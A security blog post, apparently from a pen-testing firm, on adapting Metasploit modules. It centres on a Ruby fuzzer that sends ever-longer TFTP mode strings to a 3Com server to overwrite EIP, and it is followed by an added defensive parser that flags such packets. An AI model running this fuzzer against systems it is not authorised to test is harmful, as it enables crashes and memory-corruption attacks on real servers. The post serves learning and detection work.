Fuzzing with Metasploit


We are big fans of the Metasploit Framework and its capabilities. The Metasploit Project is an open-source computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development.

What I love best about Metasploit is its vast library of code. What many users don't realize is that existing sploits can easily be modified to suit your pen testing needs. So, for those budding security researchers, check out the Metasploit archive.

Let's take this sample code, adapted from another sploit, that was modified to fuzz the 3Com TFTP server on Windows. The following code sends an increasingly long string in the transport mode field of a TFTP request and finally overwrites EIP. It can be easily modified to your liking. Exploits are written in Ruby, but don't be discouraged if you're not a programmer. There are plenty of tutorials that can help you along the way.

Enjoy!


# Metasploit Framework
#
#
# 3Com TFTP Fuzzer
#
# Jeremiah Talamantes, RedTeam Security
# http://www.redteamsecure.com
#
# FOR EDUCATIONAL PURPOSES ONLY!
# PLEASE USE RESPONSIBLY
#

require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name'        => '3Com TFTP Fuzzer',
      'Version'     => '$Revision: 1 $',
      'Description' => '3Com TFTP Fuzzer Passes Overly Long Transport Mode String',
      'Author'      => 'Jeremiah Talamantes - RedTeam Security',
      'License'     => MSF_LICENSE
    )
    register_options([
      Opt::RPORT(69)
    ], self.class)
  end

  def run_host(ip)
    # Create an unbound UDP socket
    udp_sock = Rex::Socket::Udp.create(
      'Context' => {
        'Msf'        => framework,
        'MsfExploit' => self
      }
    )
    count = 10                 # Set an initial count
    while count < 2000         # While the count is under 2000, run
      evil = "A" * count       # Set a number of "A"s equal to count
      # TFTP WRQ (opcode 2), filename "A", NUL, then the transport mode field, NUL
      pkt = "\x00\x02" + "\x41" + "\x00" + evil + "\x00"  # Define the payload
      udp_sock.sendto(pkt, ip, datastore['RPORT'])       # Send the packet
      print_status("Sending: #{evil}")                   # Status update
      resp = udp_sock.get(1)                             # Capture the response
      count += 10              # Increase count by 10, and loop
    end
  end
end
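The defender's counterpart to the fuzzer above, added here as an example that is not part of the original post or of the Metasploit Framework: a small TFTP request parser that flags exactly the kind of malformed request the fuzzer generates, usable as the core of an IDS check or a server-side input validator. It assumes RFC 1350 framing (2-byte opcode, NUL-terminated filename and mode); the 16-byte mode cap is a threshold chosen for this example.

```ruby
# Minimal TFTP request validator (added example, not from the original post).
# Assumes RFC 1350 framing: 2-byte opcode, "filename\0mode\0".

TFTP_RRQ = 1
TFTP_WRQ = 2
VALID_MODES = %w[netascii octet mail].freeze
MAX_MODE_LEN = 16   # constructed threshold; every legitimate mode is 8 bytes or less

# Parse a TFTP read/write request. Returns a hash with :opcode, :filename,
# :mode and :flags (reasons the packet looks malformed), or nil when the
# packet is not a request at all.
def parse_tftp_request(pkt)
  return nil if pkt.bytesize < 2
  opcode = pkt.byteslice(0, 2).unpack1('n')
  return nil unless [TFTP_RRQ, TFTP_WRQ].include?(opcode)

  # Body is "filename\0mode\0"; split on NUL and keep trailing empties so a
  # missing terminator is visible.
  body = pkt.byteslice(2, pkt.bytesize - 2)
  fields = body.split("\x00", -1)
  filename, mode = fields[0], fields[1]

  flags = []
  flags << :missing_terminator unless fields.length >= 3 && fields[2].empty?
  flags << :missing_mode if mode.nil? || mode.empty?
  flags << :oversized_mode if mode && mode.bytesize > MAX_MODE_LEN
  flags << :unknown_mode if mode && !mode.empty? && !VALID_MODES.include?(mode.downcase)
  { opcode: opcode, filename: filename, mode: mode, flags: flags }
end

# Build a request the same way the fuzzer does, for self-test purposes.
def build_request(opcode, filename, mode)
  [opcode].pack('n') + filename + "\x00" + mode + "\x00"
end

if __FILE__ == $0
  good = build_request(TFTP_WRQ, 'A', 'octet')
  bad  = build_request(TFTP_WRQ, 'A', 'A' * 500)   # constructed: what the fuzzer sends
  p parse_tftp_request(good)[:flags]   # => []
  p parse_tftp_request(bad)[:flags]    # => [:oversized_mode, :unknown_mode]
end
```

A request whose mode field is oversized or not one of the three RFC modes is never legitimate client traffic, so either flag alone is a reliable alert condition on port 69.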



